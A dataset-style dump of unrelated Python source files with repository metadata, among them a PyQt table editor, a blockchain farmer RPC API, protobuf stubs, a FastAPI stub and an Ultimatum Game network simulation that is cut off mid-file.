self.model = QSqlTableModel(self)
self.model.setTable(tableName)
self.model.setEditStrategy(QSqlTableModel.OnManualSubmit)
self.model.select()
self.model.setHeaderData(0, Qt.Horizontal, "ID")
self.model.setHeaderData(1, Qt.Horizontal, "First name")
self.model.setHeaderData(2, Qt.Horizontal, "Last name")
view = QTableView()
view.setModel(self.model)
submitButton = QPushButton("Submit")
submitButton.setDefault(True)
revertButton = QPushButton("&Revert")
quitButton = QPushButton("Quit")
buttonBox = QDialogButtonBox(Qt.Vertical)
buttonBox.addButton(submitButton, QDialogButtonBox.ActionRole)
buttonBox.addButton(revertButton, QDialogButtonBox.ActionRole)
buttonBox.addButton(quitButton, QDialogButtonBox.RejectRole)
submitButton.clicked.connect(self.submit)
revertButton.clicked.connect(self.model.revertAll)
quitButton.clicked.connect(self.close)
mainLayout = QHBoxLayout()
mainLayout.addWidget(view)
mainLayout.addWidget(buttonBox)
self.setLayout(mainLayout)
self.setWindowTitle("Cached Table")
def submit(self):
self.model.database().transaction()
if self.model.submitAll():
self.model.database().commit()
else:
self.model.database().rollback()
QMessageBox.warning(self, "Cached Table",
"The database reported an error: %s" % self.model.lastError().text())
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
if not connection.createConnection():
sys.exit(1)
editor = TableEditor('person')
editor.show()
sys.exit(editor.exec_())
| [
"[email protected]"
] | |
9fc60961ec8cdf589ac40c7a9a1ed86cf073e0f3 | 2c95e0f7bb3f977306f479d5c99601ab1d5c61f2 | /olive/rpc/farmer_rpc_api.py | 2544c04855463194e9428596f772ea7d75e8b7b9 | [
"Apache-2.0"
] | permissive | Olive-blockchain/Olive-blockchain-CLI | d62444f8456467f8105531178d2ae53d6e92087d | 8c4a9a382d68fc1d71c5b6c1da858922a8bb8808 | refs/heads/main | 2023-07-19T03:51:08.700834 | 2021-09-19T16:05:10 | 2021-09-19T16:05:10 | 406,045,499 | 0 | 0 | Apache-2.0 | 2021-09-19T16:05:10 | 2021-09-13T16:20:38 | Python | UTF-8 | Python | false | false | 5,569 | py | from typing import Callable, Dict, List, Optional
from olive.farmer.farmer import Farmer
from olive.types.blockchain_format.sized_bytes import bytes32
from olive.util.byte_types import hexstr_to_bytes
from olive.util.ws_message import WsRpcMessage, create_payload_dict
class FarmerRpcApi:
def __init__(self, farmer: Farmer):
self.service = farmer
self.service_name = "olive_farmer"
def get_routes(self) -> Dict[str, Callable]:
return {
"/get_signage_point": self.get_signage_point,
"/get_signage_points": self.get_signage_points,
"/get_reward_targets": self.get_reward_targets,
"/set_reward_targets": self.set_reward_targets,
"/get_pool_state": self.get_pool_state,
"/set_payout_instructions": self.set_payout_instructions,
"/get_harvesters": self.get_harvesters,
"/get_pool_login_link": self.get_pool_login_link,
}
async def _state_changed(self, change: str, change_data: Dict) -> List[WsRpcMessage]:
if change == "new_signage_point":
sp_hash = change_data["sp_hash"]
data = await self.get_signage_point({"sp_hash": sp_hash.hex()})
return [
create_payload_dict(
"new_signage_point",
data,
self.service_name,
"wallet_ui",
)
]
elif change == "new_farming_info":
return [
create_payload_dict(
"new_farming_info",
change_data,
self.service_name,
"wallet_ui",
)
]
elif change == "new_plots":
return [
create_payload_dict(
"get_harvesters",
change_data,
self.service_name,
"wallet_ui",
)
]
return []
async def get_signage_point(self, request: Dict) -> Dict:
sp_hash = hexstr_to_bytes(request["sp_hash"])
for _, sps in self.service.sps.items():
for sp in sps:
if sp.challenge_chain_sp == sp_hash:
pospaces = self.service.proofs_of_space.get(sp.challenge_chain_sp, [])
return {
"signage_point": {
"challenge_hash": sp.challenge_hash,
"challenge_chain_sp": sp.challenge_chain_sp,
"reward_chain_sp": sp.reward_chain_sp,
"difficulty": sp.difficulty,
"sub_slot_iters": sp.sub_slot_iters,
"signage_point_index": sp.signage_point_index,
},
"proofs": pospaces,
}
raise ValueError(f"Signage point {sp_hash.hex()} not found")
async def get_signage_points(self, _: Dict) -> Dict:
result: List = []
for _, sps in self.service.sps.items():
for sp in sps:
pospaces = self.service.proofs_of_space.get(sp.challenge_chain_sp, [])
result.append(
{
"signage_point": {
"challenge_hash": sp.challenge_hash,
"challenge_chain_sp": sp.challenge_chain_sp,
"reward_chain_sp": sp.reward_chain_sp,
"difficulty": sp.difficulty,
"sub_slot_iters": sp.sub_slot_iters,
"signage_point_index": sp.signage_point_index,
},
"proofs": pospaces,
}
)
return {"signage_points": result}
async def get_reward_targets(self, request: Dict) -> Dict:
search_for_private_key = request["search_for_private_key"]
return self.service.get_reward_targets(search_for_private_key)
async def set_reward_targets(self, request: Dict) -> Dict:
farmer_target, pool_target = None, None
if "farmer_target" in request:
farmer_target = request["farmer_target"]
if "pool_target" in request:
pool_target = request["pool_target"]
self.service.set_reward_targets(farmer_target, pool_target)
return {}
async def get_pool_state(self, _: Dict) -> Dict:
pools_list = []
for p2_singleton_puzzle_hash, pool_dict in self.service.pool_state.items():
pool_state = pool_dict.copy()
pool_state["p2_singleton_puzzle_hash"] = p2_singleton_puzzle_hash.hex()
pools_list.append(pool_state)
return {"pool_state": pools_list}
async def set_payout_instructions(self, request: Dict) -> Dict:
launcher_id: bytes32 = hexstr_to_bytes(request["launcher_id"])
await self.service.set_payout_instructions(launcher_id, request["payout_instructions"])
return {}
async def get_harvesters(self, _: Dict):
return await self.service.get_harvesters()
async def get_pool_login_link(self, request: Dict) -> Dict:
launcher_id: bytes32 = bytes32(hexstr_to_bytes(request["launcher_id"]))
login_link: Optional[str] = await self.service.generate_login_link(launcher_id)
if login_link is None:
raise ValueError(f"Failed to generate login link for {launcher_id.hex()}")
return {"login_link": login_link}
| [
"[email protected]"
] | |
aaa6aa548821da963e638937b213dc378966b3c7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/88/23890/submittedfiles/av2_p3_civil.py | ed8eac935d52a83bb78809e7cbded4971043205d | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
def slinha(a,x):
soma=0
for j in range(0,a.shape[1],1):
soma=soma+a[x,j]
return soma
def scoluna(a,y):
soma=0
for i in range(0,a.shape[0],1):
soma=soma+a[i,y]
return soma
def somatorio(a,x,y):
soma=(slinha(a,x)+scoluna(a,y))-(2*a[x,y])
return soma
n=input('Dê a dimensão da matriz: ')
x=input('Digite a coordenada da linha: ')
y=input('Digite a coordenada da coluna: ')
a=np.zeros((n,n))
for i in range(0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=input('Digite um elemento da matriz: ')
somatotal=somatorio(a,x,y)
print ('%d' %somatotal)
| [
"[email protected]"
] | |
3951a840c8f398942a0c28d4e5f40a8e9f9f69a1 | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2015_03_17_plastic_polycrystal/calibration.py | f385c0c6a6ac236b52df962dea3b4c3b32f84600 | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,830 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 23 14:25:50 2014
This script performs the MKS calibration given the microstructure function
and the FIP response, both in frequency space.
@author: nhpnp3
"""
import time
import numpy as np
import functions as rr
from functools import partial
import tables as tb
def calibration_procedure(el, H, ns, set_id, step, comp, wrt_file):
# open HDF5 file
base = tb.open_file("D_%s%s_s%s.h5" % (ns, set_id, step), mode="r")
# retrieve data from HDF5 file
resp = base.get_node('/', 'r%s' % comp)
r_fft = resp.r_fft[...]
M = base.root.msf.M[...]
# close the HDF5 file
base.close()
start = time.time()
specinfc = np.zeros((H, el**3), dtype='complex64')
# here we perform the calibration for the scalar FIP
specinfc[:, 0] = rr.calib(0, M, r_fft, 0, H, el, ns)
[specinfc[:, 1], p] = rr.calib(1, M, r_fft, 0, H, el, ns)
# calib_red is simply calib with some default arguments
calib_red = partial(rr.calib, M=M, r_fft=r_fft,
p=p, H=H, el=el, ns=ns)
specinfc[:, 2:(el**3)] = np.asarray(map(calib_red, range(2, el**3))).swapaxes(0, 1)
# open HDF5 file
base = tb.open_file("infl_%s%s_s%s.h5" % (ns, set_id, step), mode="a")
# create a group one level below root called infl[comp]
group = base.create_group('/',
'infl%s' % comp,
'influence function for component %s' % comp)
base.create_array(group,
'infl_coef',
specinfc,
'array of influence coefficients')
# close the HDF5 file
base.close()
end = time.time()
timeE = np.round((end - start), 3)
msg = 'Calibration, component %s: %s seconds' % (comp, timeE)
rr.WP(msg, wrt_file)
| [
"[email protected]"
] | |
a01a5b1f58abd518d11593d8bf433d842f768037 | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/pyface/i_image_cache.py | 4a5bd9b1c0f48877eacba33f5ee9f7ac19573d67 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 50 | py | # proxy module
from pyface.i_image_cache import *
| [
"[email protected]"
] | |
c3844394a1d734f67a9d8879ca813c80bfbe37eb | 80f56878dbceb714266abca85519ebbfa131404e | /app/main.py | 9266f39af6e62cd635ea47fef07f21720c4cb42c | [] | no_license | z-sector/async-fastapi-sqlalchemy | 1b944173972bc8487a2f9c638810ba0ffffbbbf5 | 9d622677c56d6d8495f3c87522216f289d52e2f7 | refs/heads/main | 2023-08-15T03:05:10.260060 | 2021-09-12T00:55:02 | 2021-09-12T00:55:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | from fastapi import FastAPI
from fastapi.responses import JSONResponse
from app.api.main import router as api_router
from app.settings import Settings
settings = Settings()
app = FastAPI(title="async-fastapi-sqlalchemy")
app.include_router(api_router, prefix="/api")
@app.get("/", include_in_schema=False)
async def health() -> JSONResponse:
return JSONResponse({"message": "It worked!!"})
if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host="0.0.0.0", port=8000)
| [
"[email protected]"
] | |
cf297f53e6ac80a9e6f143b01404bb8118b28817 | 8c5e45061286c10cba373c1576432cc43bc387fc | /venv/bin/easy_install | aeb63742c78362328a12c31888d6cfb3f0b23c7b | [] | no_license | Ruldane/Mapping-using-Pandas-Folium | 13828b18ad0c7eeb45afad46d50f94f22ef9c908 | c0f8d6cda2898f8075d52e31ba9712f47e54b145 | refs/heads/master | 2020-06-10T17:07:05.522872 | 2019-06-25T10:22:13 | 2019-06-25T10:22:13 | 193,685,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | #!/home/ruldane/PycharmProjects/Mapping/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | ||
3b14bebd791e49b44c807127e1d8c83ab8667dd2 | bc441bb06b8948288f110af63feda4e798f30225 | /resource_package_tools_sdk/model/easy_flow/deploy_strategy_pb2.pyi | 96c1f94d9b9d719ffac232700204d7507eacb6ca | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,205 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from resource_package_tools_sdk.model.cmdb.cluster_info_pb2 import (
ClusterInfo as resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo,
)
from resource_package_tools_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from resource_package_tools_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class DeployStrategy(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class App(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
appId = ... # type: typing___Text
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
appId : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.App: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.App: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"name",b"name"]) -> None: ...
class BatchStrategy(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class AutoBatch(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
def __init__(self,
*,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.AutoBatch: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.AutoBatch: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"failedStop",b"failedStop"]) -> None: ...
class ManualBatch(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class Batches(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
@property
def targets(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]: ...
def __init__(self,
*,
targets : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.ManualBatch.Batches: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.ManualBatch.Batches: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"targets",b"targets"]) -> None: ...
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
@property
def batches(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[DeployStrategy.BatchStrategy.ManualBatch.Batches]: ...
def __init__(self,
*,
batches : typing___Optional[typing___Iterable[DeployStrategy.BatchStrategy.ManualBatch.Batches]] = None,
batchNum : typing___Optional[builtin___int] = None,
batchInterval : typing___Optional[builtin___int] = None,
failedStop : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy.ManualBatch: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy.ManualBatch: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"batchInterval",b"batchInterval",u"batchNum",b"batchNum",u"batches",b"batches",u"failedStop",b"failedStop"]) -> None: ...
type = ... # type: typing___Text
@property
def autoBatch(self) -> DeployStrategy.BatchStrategy.AutoBatch: ...
@property
def manualBatch(self) -> DeployStrategy.BatchStrategy.ManualBatch: ...
def __init__(self,
*,
autoBatch : typing___Optional[DeployStrategy.BatchStrategy.AutoBatch] = None,
manualBatch : typing___Optional[DeployStrategy.BatchStrategy.ManualBatch] = None,
type : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.BatchStrategy: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.BatchStrategy: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"autoBatch",b"autoBatch",u"manualBatch",b"manualBatch"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"autoBatch",b"autoBatch",u"manualBatch",b"manualBatch",u"type",b"type"]) -> None: ...
class PackageList(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
packageName = ... # type: typing___Text
targetVersion = ... # type: typing___Text
preStop = ... # type: builtin___bool
postRestart = ... # type: builtin___bool
autoStart = ... # type: builtin___bool
userCheck = ... # type: builtin___bool
fullUpdate = ... # type: builtin___bool
packageId = ... # type: typing___Text
installPath = ... # type: typing___Text
type = ... # type: builtin___int
platform = ... # type: typing___Text
@property
def cluster(self) -> resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo: ...
def __init__(self,
*,
packageName : typing___Optional[typing___Text] = None,
cluster : typing___Optional[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo] = None,
targetVersion : typing___Optional[typing___Text] = None,
preStop : typing___Optional[builtin___bool] = None,
postRestart : typing___Optional[builtin___bool] = None,
autoStart : typing___Optional[builtin___bool] = None,
userCheck : typing___Optional[builtin___bool] = None,
fullUpdate : typing___Optional[builtin___bool] = None,
packageId : typing___Optional[typing___Text] = None,
installPath : typing___Optional[typing___Text] = None,
type : typing___Optional[builtin___int] = None,
platform : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.PackageList: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.PackageList: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"cluster",b"cluster"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"autoStart",b"autoStart",u"cluster",b"cluster",u"fullUpdate",b"fullUpdate",u"installPath",b"installPath",u"packageId",b"packageId",u"packageName",b"packageName",u"platform",b"platform",u"postRestart",b"postRestart",u"preStop",b"preStop",u"targetVersion",b"targetVersion",u"type",b"type",u"userCheck",b"userCheck"]) -> None: ...
class Status(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
outOfDate = ... # type: builtin___bool
def __init__(self,
*,
outOfDate : typing___Optional[builtin___bool] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.Status: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.Status: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"outOfDate",b"outOfDate"]) -> None: ...
id = ... # type: typing___Text
name = ... # type: typing___Text
apiVersion = ... # type: typing___Text
org = ... # type: builtin___int
type = ... # type: typing___Text
scope = ... # type: typing___Text
clusterEnvironment = ... # type: typing___Text
clusterType = ... # type: typing___Text
@property
def app(self) -> DeployStrategy.App: ...
@property
def batchStrategy(self) -> DeployStrategy.BatchStrategy: ...
@property
def clusters(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo]: ...
@property
def targetList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo]: ...
@property
def packageList(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[DeployStrategy.PackageList]: ...
@property
def status(self) -> DeployStrategy.Status: ...
def __init__(self,
*,
id : typing___Optional[typing___Text] = None,
name : typing___Optional[typing___Text] = None,
apiVersion : typing___Optional[typing___Text] = None,
org : typing___Optional[builtin___int] = None,
app : typing___Optional[DeployStrategy.App] = None,
type : typing___Optional[typing___Text] = None,
batchStrategy : typing___Optional[DeployStrategy.BatchStrategy] = None,
scope : typing___Optional[typing___Text] = None,
clusters : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo]] = None,
targetList : typing___Optional[typing___Iterable[resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo]] = None,
clusterEnvironment : typing___Optional[typing___Text] = None,
clusterType : typing___Optional[typing___Text] = None,
packageList : typing___Optional[typing___Iterable[DeployStrategy.PackageList]] = None,
status : typing___Optional[DeployStrategy.Status] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"app",b"app",u"batchStrategy",b"batchStrategy",u"status",b"status"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"apiVersion",b"apiVersion",u"app",b"app",u"batchStrategy",b"batchStrategy",u"clusterEnvironment",b"clusterEnvironment",u"clusterType",b"clusterType",u"clusters",b"clusters",u"id",b"id",u"name",b"name",u"org",b"org",u"packageList",b"packageList",u"scope",b"scope",u"status",b"status",u"targetList",b"targetList",u"type",b"type"]) -> None: ...
| [
"[email protected]"
] | |
443ad2b069ebe801ccdc2108f6045a11a4f817f6 | c2e93b806bf439136d7ff651c14601af405eddc5 | /play_input.py | 362bf3b9fe6bed561365d670f1af67ed564a0782 | [] | no_license | mehulchopradev/divya-python-core | 11bdd09072b81a7f4c46ee84170119655f9d7273 | 0d10fd5697686c3fb46ab1f9b42c0b7d2fb771b8 | refs/heads/master | 2020-08-23T20:35:12.946154 | 2019-11-05T03:00:07 | 2019-11-05T03:00:07 | 216,702,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 301 | py | print('Program starts')
n = input('Enter n : ')
# Exception handling
try:
ii = int(n)
except ValueError:
print('Please enter integer value')
else:
# will execute when there is no exception raised in the corresponding try block
print('Odd') if ii % 2 else print('Even')
print('Program ends') | [
"[email protected]"
] | |
6b152beccb5eaa5fe80526c70aa33082e6c766ef | 3a28b1a12d0710c06f6360381ad8be6cf3707907 | /modular_model/triHPC/triHPCThermo/HPCAllTrays4CstmVapO2_px_N2.py | 2fd80c1ca4fc8994a818eb65c208cb1c144cf3b0 | [] | no_license | WheatZhang/DynamicModelling | 6ce1d71d3b55176fd4d77a6aedbaf87e25ce4d02 | ea099245135fe73e8c9590502b9c8b87768cb165 | refs/heads/master | 2020-06-15T14:12:50.373047 | 2019-07-05T01:37:06 | 2019-07-05T01:37:06 | 195,319,788 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 239 | py | def VapO2_px_N2(P,T,x_N2):
x = (P-5.62017561e+02)/2.47804900e-01
y = (T--1.74950614e+02)/6.71933000e-02
z = (x_N2-7.23608844e-01)/7.27108322e-03
output = \
1*1.91797051e+00
y_O2 = output*1.00000000e+00+0.00000000e+00
return y_O2 | [
"[email protected]"
] | |
f69a22886b9e73676be73b0bbedc6f5b740e85fa | 597c4f48332251552a602122bb3d325bc43a9d7f | /etc/04_calculator/01_string.py | e88884554aa8d5499cf5f68d2c4a5093c4f0af83 | [] | no_license | Kyeongrok/python_algorithm | 46de1909befc7b17766a57090a7036886361fd06 | f0cdc221d7908f26572ae67b5c95b12ade007ccd | refs/heads/master | 2023-07-11T03:23:05.782478 | 2023-06-22T06:32:31 | 2023-06-22T06:32:31 | 147,303,654 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 26 | py | string = "1 + 2 * (3 - 4)" | [
"[email protected]"
] | |
aa9645e56df07dec0f994311efd80a58baed1428 | 159bd4c0274271aae7cf2d42bc6819957ee626c9 | /script/UG_Complex_Network_4UD.py | b19380956564614c4ec4e80c552ce2dfa34e0a4b | [] | no_license | Schuck9/UG-in-Weighted-Network | aaa9810e8806d6130ec87c275a169009da460abc | 8e2a6ebde2ed4b9e2f6d2a2ca9d84140c2c5e792 | refs/heads/master | 2021-03-01T04:03:05.983146 | 2020-04-24T02:51:34 | 2020-04-24T02:51:34 | 245,752,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,179 | py | """
A simple implementation of Ultimatum Game in complex network
@date: 2020.3.8
@author: Tingyu Mo
"""
import os
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import time
class UG_Complex_Network():
def __init__(self,node_num = 10000,network_type = "SF",update_rule ="NS",player_type = "B",
avg_degree = 4,intensity_selection = 0.01,mutate_rate = 0.001,check_point = None):
self.node_num = node_num
self.avg_degree = avg_degree
self.network_type = network_type # "SF" or "ER"
self.player_type = player_type # "A" or "B" "C"
self.update_rule = update_rule # "SP" or "SP"
self.max_weight = 0.4
self.intensity_selection = intensity_selection
self.mutate_rate = mutate_rate
self.avg_strategy = (0,0)
self.avg_pq_list=[]
if not os.path.exists("./result"):
os.mkdir('./result')
if check_point == None:
self.dir_str = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
os.mkdir("./result/{}".format(self.dir_str))
else:
self.dir_str = check_point
def build_network(self,network_type = None):
'''
building network
'''
print("Building network!")
if network_type == None:
network_type = self.network_type
if network_type == "SF":
G = nx.random_graphs.barabasi_albert_graph(self.node_num, int(self.avg_degree/2))
G = self.network_weights_asign(G)
elif network_type == "ER":
G = nx.random_graphs.erdos_renyi_graph(self.node_num, self.avg_degree/self.node_num)
for n in G.nodes():
if G.degree(n) == 0:
while True:
nbr = np.random.choice(G.nodes(),size = 1)[0]
if nbr != n:
break
G.add_edge(n, nbr)
elif network_type == "RG":
G = nx.random_graphs.random_regular_graph(self.avg_degree, self.node_num)
G = self.network_weights_asign(G)
print("平均连接度为: ",self.avg_degree_caculate(G))
return G
def nbr_weighted_check(self,G,n):
is_MaxWeight_exis = None
for nbr in G.adj[n]:
weight = G.edges[n, nbr]['weight']
if weight == self.max_weight:
is_MaxWeight_exis = nbr
break
return is_MaxWeight_exis
def network_weights_asign(self,G):
#边权重初始化
for n in list(G.nodes()):
nbrs = list(G.adj[n])
for nbr in nbrs:
G.edges[n, nbr]['weight'] = 0
#检查双方是否存在紧密联系者
for n in list(G.nodes()):
nbrs = list(G.adj[n])
for nbr in nbrs:
isMaxWeightExisIn_N = self.nbr_weighted_check(G,n)
isMaxWeightExisIn_Nbr = self.nbr_weighted_check(G,nbr)
if (isMaxWeightExisIn_N == None) and (isMaxWeightExisIn_Nbr == None):
G.edges[n, nbr]['weight'] = self.max_weight
elif (isMaxWeightExisIn_N==nbr) and (isMaxWeightExisIn_Nbr == n):
G.edges[n, nbr]['weight'] = self.max_weight
elif (isMaxWeightExisIn_N != None) or (isMaxWeightExisIn_Nbr != None) :
G.edges[n, nbr]['weight'] = (1-self.max_weight)/(self.avg_degree-1)
# 打印输出
# for n, nbrs in G.adjacency():
# for nbr, eattr in nbrs.items():
# data = eattr['weight']
# print('(%d, %d, %0.3f)' % (n,nbr,data))
cnt = 0
for n in list(G.nodes()):
result = self.nbr_weighted_check(G,n)
if result == None:
cnt += 1
print("无亲密关系者率:",cnt/self.node_num)
return G
def initialize_strategy(self,G):
'''
